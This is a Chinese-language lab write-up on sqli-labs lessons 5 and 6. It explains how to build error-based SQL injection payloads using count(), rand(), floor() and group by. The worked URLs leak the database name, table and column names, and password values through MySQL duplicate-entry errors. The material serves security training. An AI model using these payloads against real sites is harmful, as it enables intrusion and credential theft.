sql注入之lesson5&6

lesson 5&6(本章的重点在于如何构造使其产生错误，从而得到我们需要的信息)

id=1’ 报错 r ’ ’ 1’ ’ LIMIT 0,1 ’ at line 1

猜测 select usename,password from table where id='input'

id=1’ and 1=1 –+ 返回正常 id=1’ and 1=2 –+ 错误

判断字段 order by 3正确 order by 4 错误 3个字段

二.基于错误的sql语句构造
**几个重要的函数
——count():统计元组的个数

+----------+| count(*) |+----------+|      285 |+----------+从information_schema.tables统计元组个数有多少——rand():  用于产生一个0~1的随机数mysql> select rand();+--------------------+| rand()             |+--------------------+| 0.9833602495336535 |+--------------------+1 row in set (0.00 sec)——floor(): 向下取整mysql> select floor(rand());+---------------+| floor(rand()) |+---------------+|             0 |+---------------+1 row in set (0.00 sec)mysql> select floor(rand()*2);+-----------------+| floor(rand()*2) |+-----------------+|               1 |+-----------------+1 row in set (0.00 sec)——group by:一句我们想要的规则对结果进行分组mysql> select table_name,table_schema from information_schema.tables group by table_schema;+----------------+--------------------+| table_name     | table_schema       |+----------------+--------------------+| ia3nznrjd4                  | challenges                       || CHARACTER_SETS | information_schema    || columns_priv              | mysql                                || accounts                      | performance_schema  || emails                           | security                           || host_summary            | sys                                    |+------------------------+-------------------------+6 rows in set (0.01 sec)

在information_schema中选择table_name与table_schema,并且按照table_schema
进行排序，在table_name中显示table_chema中的第一个表

---

进入mysql命令行use security;select database();select group_concat(0x3a,0x3a,database(),0x3a)name;(0x3a 是分号的，表头太长取一个别名name)+-------------+| name        |+-------------+| ::security: |+-------------+接下来我们向里面添加刚才的随机数函数select group_concat(0x3a,0x3a,database(),0x3a,floor(rand()*2))name;+--------------+| name         |+--------------+| ::security:1 |+--------------+我们再增加一点内容select group_concat(0x3a,0x3a,database(),0x3a,floor(rand()*2))name from information_schema.tables;informaition.tables 有多少条记录security显示多少次 随机数就执行多少次。为了让显示更有序 我们换成排列  concatselect concat(0x3a,0x3a,database(),0x3a,floor(rand()*2))name from informaition_schema.tables;对结果分组 以那么分组select concat(0x3a,0x3a,database(),0x3a,floor(rand()*2))name from informaition_schema.tables group by name;加一个count统计select count(*),concat(0x3a,0x3a,database(),0x3a,floor(rand()*2))name from information_schema.tables group by name;多刷新几次 发现报错了，报错的信息有数据库的名字 那么我们可以的到更多信息ERROR 1062 (23000): Duplicate entry '::security:0' for key '<group_key>'我们将database换成versionselect count(*),concat(0x3a,0x3a,version(),0x3a,floor(rand()*2))name from information_schema.tables group by name;ERROR 1062 (23000): Duplicate entry '::5.7.19:1' for key '<group_key>'为了得到想要查询的东西比如说添加一个复杂的查询语句select count(*),concat(0x3a,0x3a,version(),0x3a,floor(rand()*2))name from information_schema.tables group by name;将version()换为(select table_name from information_schema.tables where table_schema=database() limit 0,1)报错得到信息  继续查看其他信息 修改limit参数

---

回到sql注入 继续使用

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and   (select count(*),concat(0x3a,0x3a,database(),0x3a,floor(rand()*2))name from information_schema.tables group by name) --+ 报错：Operand should contain 1 column(s)    操作应包含一列 { kc表是一个数据表，假设表的行数为10行。 select  1 from kc    增加临时列，每行的列值是写在select后的数，这条sql语句中是1 } 我们增加一列 http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and   (select 1 from (select count(*),concat(0x3a,0x3a,database(),0x3a,floor(rand()*2))name from information_schema.tables group by name)) --+ 报错： Every derived table must have its own alias    每个派生表必须有自己的别名 修改如下?id=1' and (select 1 from (select  count(*),concat(0x3a,0x3a,database(),0x3a,floor(rand()*2))name from information_schema.tables group by name)b) --+ 报错得到数据库名 Duplicate entry ::security:0 for key'  按照之前的想法我们把database() 换成更复杂的语句 (select table_name from information_schema.tables where table_schema=database() limit 0,1) Duplicate entry '::emails:0' for key ''  得到表名email  修改limit得到第二个表 Duplicate entry '::users:1' for key ''为了得到user表里面的列名 修改一下(select column_name from information_schema.columns where table_name='users' limit 0,1)Duplicate entry '::USER:0' for key ''得到了其中的user列名 修改得到其他列名  得到password列名获取字段内容 (select password from users  limit 0,1)  得到   Duplicate entry '::Dumb:1' for key ''

介绍完了 基于错误的 sql注入 lesson6 改为双引号就可以了

这里为什么会报错 是mysql的一个bug http://bugs.mysql.com/bug.php?id=32249